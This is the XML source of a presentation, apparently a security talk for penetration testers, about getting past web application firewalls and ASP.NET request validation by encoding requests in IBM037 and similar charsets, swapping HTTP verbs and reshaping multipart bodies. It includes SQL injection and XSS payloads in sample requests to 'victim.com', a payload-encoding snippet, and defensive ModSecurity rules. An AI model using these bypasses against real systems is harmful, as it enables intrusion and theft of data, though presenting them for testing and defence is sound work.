                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4154697783"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1225040">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="953696566"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1293442">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3989794098"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2979533">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="570425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Target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QueryString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POST Body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&amp; and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URL-encoding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804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Nginx, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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uWSGI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Django - Python3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082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Nginx, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>uWSGI</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> - Django - Python2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r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> (sometimes required)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67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Apache</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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Tomcat - JSP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r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> (sometimes required)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41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IIS - ASPX (v4.x)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r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> (optional)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16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IIS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> - ASP classic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374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Apache/IIS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> - PHP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870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7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43190" y="217333"/>
            <a:ext cx="7454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Encoding/Conversion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3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Similar to a substitution </a:t>
            </a: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ciphers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Payload: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&lt;script&gt;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IBM037/IBM500/cp875/IBM1026 </a:t>
            </a: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URL-encoded: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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L%A2%83%99%89%97%A3n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Simple Python code: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13936" y="4829850"/>
            <a:ext cx="8361802" cy="830997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US" altLang="en-US" sz="16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urllib</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="16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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="16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'Payload Here'</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="16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600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof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kumimoji="0" lang="en-US" altLang="en-US" sz="16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urllib.quote_plus(s.encode(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A5C26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"IBM037"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="1" smtClean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kumimoji="0" lang="en-US" altLang="en-US" sz="40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Automating Request Encoding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Burp Suite HTTP Smuggler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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/nccgroup/BurpSuiteHTTPSmuggler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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Supports request encoding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More to come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009" y="2926928"/>
            <a:ext cx="6260399" cy="37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Example 1: Cloudflare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12" y="2149595"/>
            <a:ext cx="536857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775" y="2149595"/>
            <a:ext cx="5373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40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Example 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1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ModSecurity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2" y="1687903"/>
            <a:ext cx="6915150" cy="4200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225" y="2474199"/>
            <a:ext cx="6906589" cy="4201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66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0165" y="217333"/>
            <a:ext cx="403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Testers’ </a:t>
            </a:r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Nightmare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500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B01C32"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="28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 simple request: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B01C32"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8">
                    <a:lumMod val="10000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Could you please whitelist our IP address range for this assessment?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8">
                    <a:lumMod val="10000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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An unhelpful response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0"/>
              <a:t>You are the hacker, figure it out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>yourself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/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Why should we whitelist you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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Not enough time!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Reduces quality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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WAF effectiveness test is a separate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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875" y="2680011"/>
            <a:ext cx="1945864" cy="2590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91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6930" y="217333"/>
            <a:ext cx="9254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ASP.NET Request Validation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Bypass 1/5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AntiXSS</a:t>
            </a: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 bypass, limits:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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“On error resume next” – or – an empty “catch” around the first read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Ignores the first use (sees an empty string)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Can target GET or POST not both at the same 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73" y="3852302"/>
            <a:ext cx="5917121" cy="2344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393" y="3843992"/>
            <a:ext cx="5760000" cy="27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146" y="217333"/>
            <a:ext cx="846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ASP.NET Request Validation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Bypass 2/5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Useful for:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Stored XSS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Validation bypass if (time-of-check time-of-use issue)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It validates an input parameter and an empty string is Ok to go through!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It reads the same input parameter again from GET or POST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The twist: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When payload is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1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QueryString</a:t>
            </a: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, method should be POST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When payload is </a:t>
            </a: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in the body, method should be GET (keep the content-type header)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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146" y="217333"/>
            <a:ext cx="846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ASP.NET Request Validation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Bypass 3/5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Exploiting XSS in the POST body as an example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="16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post_param_1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>(000)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="16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&amp;post_param_2=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>(111)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000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10" y="3186628"/>
            <a:ext cx="10450383" cy="2276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77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146" y="217333"/>
            <a:ext cx="846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ASP.NET Request Validation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Bypass 4/5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SQL injection when single quote is not allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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56" y="2579684"/>
            <a:ext cx="10329074" cy="2617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5199" y="5414290"/>
            <a:ext cx="10482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Using encoding payload would be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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GB" sz="16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?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1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foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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&gt;'union all select password from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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'admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28600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146" y="217333"/>
            <a:ext cx="846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ASP.NET Request Validation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Bypass 5/5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?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1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foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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&gt;'union all select password from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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='admin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7" y="2498699"/>
            <a:ext cx="11072580" cy="2602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11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146" y="217333"/>
            <a:ext cx="846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How to Stop Request Encoding?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Write a new rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b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 when only “charset=utf-8” is allowed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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SecRule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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en-US" sz="1600" i="1" dirty="0" err="1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REQUEST_HEADERS:Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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 "@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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rx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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 (?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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)charset\s*=\s*(?!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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utf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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\-8)" 	"id:'1313371',phase:1,t:none,deny,log,msg:'Invalid charset not allowed', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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logdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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:'%{MATCHED_VAR}'"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Incapsula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b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r-FR" sz="1600" i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	Content-Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1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contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i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 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1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charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i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" &amp; Content-Type not-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1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contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i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 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1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charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i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=utf-8"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1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7030A0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5199" y="5414290"/>
            <a:ext cx="10482387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en-GB" sz="16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601" y="1653872"/>
            <a:ext cx="122112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>
                    <a:lumMod val="95000"/>
                  </a:schemeClr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Test Case Walkthrough</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr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882" y="3029346"/>
            <a:ext cx="5730238" cy="485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4477" y="3093057"/>
            <a:ext cx="5224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55E6D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>Today’s Test Case: IIS 10 ASPX (v4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35243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7431" y="217333"/>
            <a:ext cx="795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Today’s Test Case: IIS 10 ASPX (v4)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5 Simple Steps:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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verb replacement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Changing body type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Removing unnecessary parts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Adding </a:t>
            </a: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unused </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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parts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Changing request </a:t>
            </a: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encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000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561" y="217333"/>
            <a:ext cx="721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Step 1 – HTTP </a:t>
            </a:r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Verb Replacement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Replacing POST with GET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on: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IIS (tested on ASP classic, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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ASPX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PHP</a:t>
            </a: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“content-type” header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390" y="217333"/>
            <a:ext cx="928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Request A – Obviously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Bad (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1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SQLi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 Payload)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POST</a:t>
            </a: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/path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1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urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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Content-Length: 41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solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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input1='union all select * from users--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477041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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3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1659" y="217333"/>
            <a:ext cx="547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Where Can I Find Them?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04005">
            <a:off x="1250878" y="1903894"/>
            <a:ext cx="3672946" cy="3229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5134">
            <a:off x="7108983" y="2127479"/>
            <a:ext cx="4064365" cy="573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08610">
            <a:off x="4795942" y="2917703"/>
            <a:ext cx="4502958" cy="15561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51259">
            <a:off x="6858272" y="4254053"/>
            <a:ext cx="3974166" cy="11152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59837">
            <a:off x="3141944" y="4970577"/>
            <a:ext cx="3927757" cy="10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Request A1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00B05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GET</a:t>
            </a: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/path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1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urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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Content-Length: 41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solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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input1='union all select * from users-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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8135"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10477041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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4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561" y="217333"/>
            <a:ext cx="721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Step 2 – Changing Body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Type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72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uploads also use “multipart/form-data”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on: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Nginx,uWSGI-Django-Python3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Nginx,uWSGI-Django-Python2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Apache-PHP5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err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mod_php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Apache-PHP5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err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FastCGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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IIS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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ASPX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PHP)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Request A1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GET</a:t>
            </a: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/path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: 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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1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urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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Content-Length: 41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solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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input1='union all select * from users-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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77041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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5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Request A2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GET</a:t>
            </a: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/path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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multipart/form-data; boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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=--1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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Content-Length: [length of body]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solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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 smtClean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----1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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Content-Disposition: form-data; name="input1"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solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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'union all select * from users--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 smtClean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----1-</a:t>
            </a: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77041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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7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2010" y="217333"/>
            <a:ext cx="822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Step 3 – Removing </a:t>
            </a:r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Unnecessary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Parts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465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we remove some parts of the body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean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not be useful if misshaped requests are detected</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8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last “--” in the boundary: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Nginx,uWSGI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-Django-Python 2 &amp; 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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Apache-PHP5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err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mod_php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000" dirty="0" err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FastCGI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4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IIS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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ASPX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PHP)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“form-data;” from the multipart request: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Apache-PHP5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err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mod_php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000" dirty="0" err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FastCGI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IIS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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ASPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Request A2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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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  <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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Content-Length: [length of body]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 smtClean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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--1</a:t>
            </a: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Content-Disposition: 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form-data;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 name="input1"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'union all select * from users--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 smtClean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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--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--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77041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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0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Request A3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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; boundary=1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Content-Length: [length of body]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--1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Content-Disposition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name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="input1"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'union all select * from users--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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0"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  <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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869701"/>
              </p:ext>
